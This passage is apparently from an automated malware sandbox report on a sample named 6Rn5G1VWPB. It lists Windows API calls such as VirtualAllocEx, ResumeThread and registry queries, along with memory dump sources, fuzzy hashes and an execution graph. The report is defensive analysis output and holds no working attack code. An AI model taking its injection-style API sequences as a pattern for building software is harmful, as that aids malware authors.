                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0107BE89,00000800,00000000,00000000), ref: 0107C09A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c39b7ae983e9bd30fd75b9e6e609b4d863c95ecf107567c9a542ae85a3b33784
                                  • Instruction ID: a1f4ca454874d602570b83ae19f06c4ab0e959ef3742fe07aa6595c2b9d87490
                                  • Opcode Fuzzy Hash: c39b7ae983e9bd30fd75b9e6e609b4d863c95ecf107567c9a542ae85a3b33784
                                  • Instruction Fuzzy Hash: 4A1136B2D002098FDB10CFAAD484BDEFBF4AB49314F14852EE955A7200C375A546CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: b42317588e9e805d1f7a77c6072f873b82626f1f25d5f7b867f03210b61c44a4
                                  • Instruction ID: 3a7246e2a93f113e65e9efd2544a85f7091ecae7e094a9aa13d5c34db86e2f1a
                                  • Opcode Fuzzy Hash: b42317588e9e805d1f7a77c6072f873b82626f1f25d5f7b867f03210b61c44a4
                                  • Instruction Fuzzy Hash: 9B1136B19003488FCB10DFAAC4497DFFBF4AB88224F24842AD519A7240C779A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0107BE0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 09b8067f9ecc1b6e4428c5ddb1577645802e9bb0287c8ba0528ab388078179d1
                                  • Instruction ID: 59687dfc492f316e8698cc8495d9f6fe9918b064f00b253bffc8213e4bfc3123
                                  • Opcode Fuzzy Hash: 09b8067f9ecc1b6e4428c5ddb1577645802e9bb0287c8ba0528ab388078179d1
                                  • Instruction Fuzzy Hash: 031110B2C002498FDB10CF9AC448BDEFBF4EB88324F10846AD969A7700C374A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0B3CC2D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 73cc54f1d31b29bc5089db203ce39b8af6a7ad677f47429a4be2d7d1f484c037
                                  • Instruction ID: 781e3fcf18ff20abcd9026e4666e3024f5eaeae48640ea5dcaabe5bc4b91a46c
                                  • Opcode Fuzzy Hash: 73cc54f1d31b29bc5089db203ce39b8af6a7ad677f47429a4be2d7d1f484c037
                                  • Instruction Fuzzy Hash: 5E1115B5800349CFCB10CF9AD488BDEBBF4EB48324F14846AE959A7740D778A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0107DF1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  • Opcode ID: 7930cd1cb40e49a07e579fd8fe5ae97cbfa35e0c64a2f7558f3bb281b7802d59
                                  • Instruction ID: d3adedd5b9b6820d60b65682d8530580b8acfce3e235e5f02a46bcc4599b8ce6
                                  • Opcode Fuzzy Hash: 7930cd1cb40e49a07e579fd8fe5ae97cbfa35e0c64a2f7558f3bb281b7802d59
                                  • Instruction Fuzzy Hash: 061103B59002488FDB20CF99D489BDEBBF4FB48320F10845AE959A7700C374A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0107DF1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  • Opcode ID: 607463eeb1eb0c33b57f88ed0c98eac4b133195aebc85defb4b772184da5503a
                                  • Instruction ID: 254805399994496aeb8bc06b8a8e6776bba8ebcc2c26d51a84cef0b29bf546f3
                                  • Opcode Fuzzy Hash: 607463eeb1eb0c33b57f88ed0c98eac4b133195aebc85defb4b772184da5503a
                                  • Instruction Fuzzy Hash: 7411D0B59002499FDB10CF9AD488BDEBBF8EB48324F10845AE955A7700C3B5A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0B3CA0BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: e0074c10ff0e80efdf67a0c3e5fd107f5bc2f208c1624649a6f2510573030e6d
                                  • Instruction ID: 177d6364a2961227f05c93750727ea4e851a591a71aa3a0717c8385bd1ba59de
                                  • Opcode Fuzzy Hash: e0074c10ff0e80efdf67a0c3e5fd107f5bc2f208c1624649a6f2510573030e6d
                                  • Instruction Fuzzy Hash: 2D11D3B58003599FDB10CF9AD888BDFBBF8FB48324F10845AE554A7600C375A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B3C6D9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 6d19f8560d9d5af23fcb335ae8b465a875c0fa8346be577e6a3249048d2d0806
                                  • Instruction ID: 994c651417faac4b7b6e7145254317450bd3e4244d22baa00c5d66700e5747c4
                                  • Opcode Fuzzy Hash: 6d19f8560d9d5af23fcb335ae8b465a875c0fa8346be577e6a3249048d2d0806
                                  • Instruction Fuzzy Hash: A5014C759042098FCF10CFA9D8447DFBBF1BF88314F14C429E555A7250C7759554DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656871841.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_100d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f5cd1362beacc973b946b3ff38fa8e4d7a20de309a05ef18813a10be2e4ef13
                                  • Instruction ID: 658014416a8e970105fca4c62e0ba85832d56449917933b76311e144dace5f95
                                  • Opcode Fuzzy Hash: 6f5cd1362beacc973b946b3ff38fa8e4d7a20de309a05ef18813a10be2e4ef13
                                  • Instruction Fuzzy Hash: DD212BB1504200DFEB06CF94D9C0B16BFA5FB88329F2485A9ED454B286C337D846C7B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656892024.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_101d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba3b051830634da3b9392592b0b462b3fc045631cdf9d813312111fdfb64dfc3
                                  • Instruction ID: b2c94af934246662300f60e422ce33b9dac64b921507e485abaf34ace7b7b13b
                                  • Opcode Fuzzy Hash: ba3b051830634da3b9392592b0b462b3fc045631cdf9d813312111fdfb64dfc3
                                  • Instruction Fuzzy Hash: 7C2137B5504200DFCB16CF54D8C8B16BBA1FB84354F24C9ADE9894B24AC37AD847CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656871841.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_100d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                  • Instruction ID: 93aadc86b161e80a20f688a27d98c1a2c553c41e3ebf3098e5bd3893467deba5
                                  • Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                  • Instruction Fuzzy Hash: DF11B176504280CFDB12CF54D5C4B16BFB1FB88324F2886AADC450B656C33AD456CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656892024.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_101d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
                                  • Instruction ID: e6c7a6b85ab98896adbcd86bfad86c2e11b55df5683a466089c1df286e7218c7
                                  • Opcode Fuzzy Hash: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
                                  • Instruction Fuzzy Hash: AB11D075504280CFCB12CF54D5C8B15FFB1FB44314F28C6AAE8494B65AC33AD44ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656871841.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_100d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecb5bf181f6e689b12fc0329063d090ecbfce95b284e54b094ac4424964bdaa8
                                  • Instruction ID: b05e0f988bbdcdd8c0828baee35d9229fe2fe00dbaa05f28c3ab5f38382f58cc
                                  • Opcode Fuzzy Hash: ecb5bf181f6e689b12fc0329063d090ecbfce95b284e54b094ac4424964bdaa8
                                  • Instruction Fuzzy Hash: 5E01A7715083549AF7124AE6DC84766BBD8EF45634F08C09AEE495B286C3789A44C7B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656871841.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_100d000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1ad44567de1729d3f6219d41ae8b214d8003883ce2c59cfbce807bd6e1f2c49
                                  • Instruction ID: f403c59c31c396a3289571728c0520440c3cec916b1fc7eaacb018e4504727a6
                                  • Opcode Fuzzy Hash: a1ad44567de1729d3f6219d41ae8b214d8003883ce2c59cfbce807bd6e1f2c49
                                  • Instruction Fuzzy Hash: 27F062714042949EEB518A5ADCC4B62FFD8EB55634F18C49AED485B286C3789844CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 3Lbk$8s8$rEb
                                  • API String ID: 0-1209182574
                                  • Opcode ID: a363645b3f18ec3bc6ec784e752fdd8cc2ef5145ff1522fecd34d593346d3a0b
                                  • Instruction ID: 50e1f228e9be239fe8d35f98facbfb324e4b60da754793e127547dafc871ff5f
                                  • Opcode Fuzzy Hash: a363645b3f18ec3bc6ec784e752fdd8cc2ef5145ff1522fecd34d593346d3a0b
                                  • Instruction Fuzzy Hash: C991B0B4E49209DF8B58CFE9D5815EEBBF6EB89300F20902AD515BB254D730AE02CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 3Lbk$rEb
                                  • API String ID: 0-2844450111
                                  • Opcode ID: 142c0341489aa611638f08ed1f292bbede3381ab2086407961f284cddd6938f4
                                  • Instruction ID: 9eb1e4c4f4067dba90e4e26188c343f352b241f8328c1aa853576e8f4099c2fb
                                  • Opcode Fuzzy Hash: 142c0341489aa611638f08ed1f292bbede3381ab2086407961f284cddd6938f4
                                  • Instruction Fuzzy Hash: 9C91CFB5E59209DFCB58CFE9D5815EEBBF2EB89300F20912AD415BB254E730AE01CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: nW9&
                                  • API String ID: 0-1338470238
                                  • Opcode ID: a34dcd57446acd2e74330720a69453e9c1de464eb55c4dadff336ca940113fc0
                                  • Instruction ID: 0b8bbd23b6bb088dec1768cf58ab47645cbd2ce10efd2eac5dda01d2b8e006b4
                                  • Opcode Fuzzy Hash: a34dcd57446acd2e74330720a69453e9c1de464eb55c4dadff336ca940113fc0
                                  • Instruction Fuzzy Hash: BDB11374E052598BDB08CFEAC9915DEFBF2BB98300F24D12AD414EB358E7349D428B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5:`
                                  • API String ID: 0-1378078324
                                  • Opcode ID: 44a36f1d4b49f0373300f350339430d755f36a0bd974c02d7c46325a1c49cd51
                                  • Instruction ID: 52d7653b0fddf43c331ed3f0a265b6f937e59ce4d4e65899469d7aae1fd40944
                                  • Opcode Fuzzy Hash: 44a36f1d4b49f0373300f350339430d755f36a0bd974c02d7c46325a1c49cd51
                                  • Instruction Fuzzy Hash: BE319171D116188FDB18CFBAD98469ABBF3AFC9300F55C06AC448AB259DB301982CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e581211f8b080566eb17a7d09402c11c2d5aeb3d65e9e6bceacc922a17674ce
                                  • Instruction ID: 185995bb4b8d59289ea2bd7862531deafcda6966159425c94517cdbfd4bcd559
                                  • Opcode Fuzzy Hash: 3e581211f8b080566eb17a7d09402c11c2d5aeb3d65e9e6bceacc922a17674ce
                                  • Instruction Fuzzy Hash: 305239B9D807068FD710CF1CEDC85997BA1FB44328BD24A08D2616BAD1D7B8657ACF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd382ea9c7d1fc8254c6d472a8447c983c47ec61ff10c0132eb40108d7730a8c
                                  • Instruction ID: 3a270f065c57ca692486285969f142b464c5657b0df0890e44a296601d232470
                                  • Opcode Fuzzy Hash: fd382ea9c7d1fc8254c6d472a8447c983c47ec61ff10c0132eb40108d7730a8c
                                  • Instruction Fuzzy Hash: 71A16D36E0021ACFCF05DFA9C8445DEBBF2FF89304B15856AE905AB261EB35E955CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656198943.0000000000622000.00000002.00020000.sdmp, Offset: 00620000, based on PE: true
                                  • Associated: 00000000.00000002.656193474.0000000000620000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.656361773.0000000000716000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.656374839.0000000000726000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_620000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bba827c84f821d5d6d7ed769fcfcf44a638718b49557519cecf6f1cc0aa9cff9
                                  • Instruction ID: cb888c95f2fe2bc4b2f4b07e715ad9306d6ad650b7cea5f34990ee00113b5418
                                  • Opcode Fuzzy Hash: bba827c84f821d5d6d7ed769fcfcf44a638718b49557519cecf6f1cc0aa9cff9
                                  • Instruction Fuzzy Hash: 2581CEA644E3C15FC7538B748CA96827FB19E23120B1E45EBD4C1CE4A3E15C4A5ACB73
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:13.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:48
                                  Total number of Limit Nodes:6

                                  Graph

                                  execution_graph 51383 10d10e5 51384 10d10f6 KiUserExceptionDispatcher 51383->51384 51386 10d1125 51384->51386 51395 10c9e98 51386->51395 51387 10d1707 LdrInitializeThunk 51390 10d1779 51387->51390 51403 10ced1f 51390->51403 51391 10d1b78 51392 10d1356 51392->51387 51396 10c9ea9 51395->51396 51398 10c9ecc 51395->51398 51396->51392 51397 10c9ef9 51397->51392 51398->51397 51399 10ca4b0 RegQueryValueExW 51398->51399 51400 10ca4a0 RegQueryValueExW 51398->51400 51407 10ca1f8 51398->51407 51412 10ca1f5 51398->51412 51399->51398 51400->51398 51405 10ce9bb 51403->51405 51405->51403 51406 10ced92 KiUserExceptionDispatcher 51405->51406 51417 10ca4b0 51405->51417 51406->51391 51408 10ca22c RegOpenKeyExW 51407->51408 51409 10ca209 51407->51409 51411 10ca30e 51408->51411 51409->51398 51411->51411 51413 10ca22c RegOpenKeyExW 51412->51413 51414 10ca209 51412->51414 51416 10ca30e 51413->51416 51414->51398 51418 10ca4e4 RegQueryValueExW 51417->51418 51419 10ca4c1 51417->51419 51421 10ca5cb 51418->51421 51419->51405 51421->51421 51436 10c7e20 51437 10c7e3f LdrInitializeThunk 51436->51437 51439 10c7e90 51437->51439 51468 10d0a70 51469 10d0a76 51468->51469 51470 10d0e69 KiUserExceptionDispatcher 51469->51470 51471 10d0e88 51470->51471 51472 10d1109 KiUserExceptionDispatcher 51471->51472 51473 10d1125 51472->51473 51481 10c9e98 4 API calls 51473->51481 51474 10d1707 LdrInitializeThunk 51477 10d1779 51474->51477 51475 10d1adb KiUserExceptionDispatcher 51478 10d1b78 51475->51478 51480 10ced1f RegQueryValueExW 51477->51480 51479 10d1356 51479->51474 51480->51475 51481->51479 51482 10ee210 51485 10ee235 51482->51485 51483 10ee3af 51484 10ee994 LdrInitializeThunk 51484->51485 51485->51483 51485->51484

                                  Executed Functions

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914379656.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10e0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 981517bb437fcb74ecd089a6947ed9bfcbc0db709a82644a1e0dce1543f9b961
                                  • Instruction ID: eace6ac819185f0e0f8a619e83b987d67fd1146ed555c6d0bc4bd80a7958dc6d
                                  • Opcode Fuzzy Hash: 981517bb437fcb74ecd089a6947ed9bfcbc0db709a82644a1e0dce1543f9b961
                                  • Instruction Fuzzy Hash: B5621B31E046198FDB24EF79C95469EB7F2AF89300F1086A9D549AB750EF30AE85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914313245.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8cb195d3dbface1ecdc3a8986ecba2770074b116d9c59cb6ccc2b667a1bb17ee
                                  • Instruction ID: b1ff22a5e297d1bfabb844048d7059460d22273d0d6692244f8b18fc1067d26c
                                  • Opcode Fuzzy Hash: 8cb195d3dbface1ecdc3a8986ecba2770074b116d9c59cb6ccc2b667a1bb17ee
                                  • Instruction Fuzzy Hash: 87614B30A012069FDB14EBB9D458BAE77F7AF84704F10852CD442AB354DF74994ACF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID: x l
                                  • API String ID: 2638914809-2770355295
                                  • Opcode ID: db40fc143cd2cffae603ae3e384517fdc3b0a06b4c4e95d38a51b3a90688e021
                                  • Instruction ID: 15743bfb0ee04be2fce7a36e1772264cbe93d29a82cdcaf9bdcb5aa8a0d1a4e4
                                  • Opcode Fuzzy Hash: db40fc143cd2cffae603ae3e384517fdc3b0a06b4c4e95d38a51b3a90688e021
                                  • Instruction Fuzzy Hash: 1EA203B4A04228CFCB64EB24D89879DB7B6BF88305F1085E9E949A3754CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 2edf367f3a5861f1ae640fccd90739daf7a6791a68bda4364fc60fbd559f8bce
                                  • Instruction ID: c713249a4f9ce14a073492b340fbc79f68fb6e8d40d298c96f55616ba1c6ec98
                                  • Opcode Fuzzy Hash: 2edf367f3a5861f1ae640fccd90739daf7a6791a68bda4364fc60fbd559f8bce
                                  • Instruction Fuzzy Hash: A662F774A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: cf66bb869b2bff985803ddba2f13eface1f098a03449a7a225aaef22d7802f91
                                  • Instruction ID: 30bdfc516ed3a8bdf0448f9681ad27962eb4c743d90b31085539e0b96ad5ed07
                                  • Opcode Fuzzy Hash: cf66bb869b2bff985803ddba2f13eface1f098a03449a7a225aaef22d7802f91
                                  • Instruction Fuzzy Hash: 90520674A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: e30265a5b66a4cc20d442280e2c23597e0604bac0b892840ab666a2b8729db57
                                  • Instruction ID: aa2ed94583d1c5b52520c84889ea85564a3f23b830c0943929602c2cb869780b
                                  • Opcode Fuzzy Hash: e30265a5b66a4cc20d442280e2c23597e0604bac0b892840ab666a2b8729db57
                                  • Instruction Fuzzy Hash: F152F7B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 994b41654fab6abfa3e84a3df7d6c87010e2caf22b41f1cbf1a77d4196fc72d2
                                  • Instruction ID: fbd51c8348d737f55ee05c3fe6e6574165a019e5be23e228b3b53119cce3a843
                                  • Opcode Fuzzy Hash: 994b41654fab6abfa3e84a3df7d6c87010e2caf22b41f1cbf1a77d4196fc72d2
                                  • Instruction Fuzzy Hash: 8352F774A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
